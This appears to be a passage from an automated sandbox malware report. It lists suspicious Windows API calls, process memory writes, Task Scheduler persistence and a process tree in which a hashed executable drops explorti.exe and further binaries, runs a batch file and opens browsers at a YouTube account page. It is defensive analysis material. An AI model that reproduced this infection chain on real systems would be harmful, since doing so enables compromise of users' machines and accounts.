N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adada.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\1000029002\a2f7c1badc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4788 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 4788 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 4788 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe
PID 3116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe
PID 3116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe
PID 1492 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe C:\Windows\system32\cmd.exe
PID 4860 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4860 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4860 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4860 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4860 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4860 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2348 wrote to memory of 752 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2348 wrote to memory of 752 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 848 wrote to memory of 4648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 848 wrote to memory of 4648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C37F.tmp\C380.tmp\C381.bat C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffebe23cc40,0x7ffebe23cc4c,0x7ffebe23cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebe0f46f8,0x7ffebe0f4708,0x7ffebe0f4718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

